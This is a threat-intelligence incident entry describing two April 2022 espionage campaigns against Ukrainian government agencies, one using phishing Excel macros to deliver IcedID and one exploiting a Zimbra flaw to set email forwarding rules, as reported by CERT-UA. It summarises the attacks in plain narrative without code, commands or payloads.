Cyber Incident Victim: Government of Ukraine
Date:
Apr 2022
Location:
Ukraine
Summary
Hackers targeted Ukrainian government agencies using phishing attacks distributing malicious Excel documents to deploy IcedID malware for credential theft and as a loader for further malware, alongside exploiting a Zimbra vulnerability via malicious emails to establish email forwarding rules for espionage purposes. The campaigns, attributed to threat clusters UAC-0041 and UAC-0097, aimed to infiltrate internal networks for cyber-espionage against critical government entities. CERT-UA identified both incidents, linking the first to a group previously associated with AgentTesla distribution and the second to an unknown actor.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 3 techniques |
| Threat Actors | Type | Location |
|---|---|---|
| 2 actors | Available to members | Available to members |
Description
On April 14, 2022, Ukraine's Computer Emergency Response Team (CERT-UA) identified two distinct cyber campaigns targeting Ukrainian government entities. The first campaign involved phishing emails distributing malicious Excel documents titled "Mobilization Register.xls." These files contained macros designed to execute upon opening, leading to the download and installation of IcedID malware, a modular banking trojan capable of credential theft and deploying additional payloads. CERT-UA attributed this activity to threat cluster UAC-0041, a group previously associated with AgentTesla malware distribution. The second campaign utilized emails carrying malicious JPG attachments exploiting CVE-2018-6882, a vulnerability in the Zimbra email collaboration platform. This exploit enabled attackers to establish unauthorized email forwarding rules, facilitating data exfiltration. CERT-UA assigned this activity to previously unidentified threat actor UAC-0097. Both operations aimed to infiltrate government networks for cyber-espionage purposes against critical Ukrainian agencies.
The attacks demonstrated distinct technical approaches but shared operational objectives of network penetration and intelligence gathering. IcedID's deployment as a loader suggested potential follow-on malware stages, while the Zimbra exploit focused on persistent email monitoring through rule manipulation. CERT-UA confirmed the campaigns represented ongoing malicious activity against Ukrainian infrastructure but did not disclose specific victim agencies or data compromise metrics. The agency publicly documented both intrusion methods, emphasizing the Zimbra vulnerability's criticality and urging immediate patching to prevent exploitation. No remediation details were provided regarding the IcedID infections, though standard incident response protocols for banking trojans typically involve endpoint cleansing, credential rotation, and network traffic analysis. The incidents underscored continuous adversarial focus on Ukrainian governmental systems during the 2022 conflict period.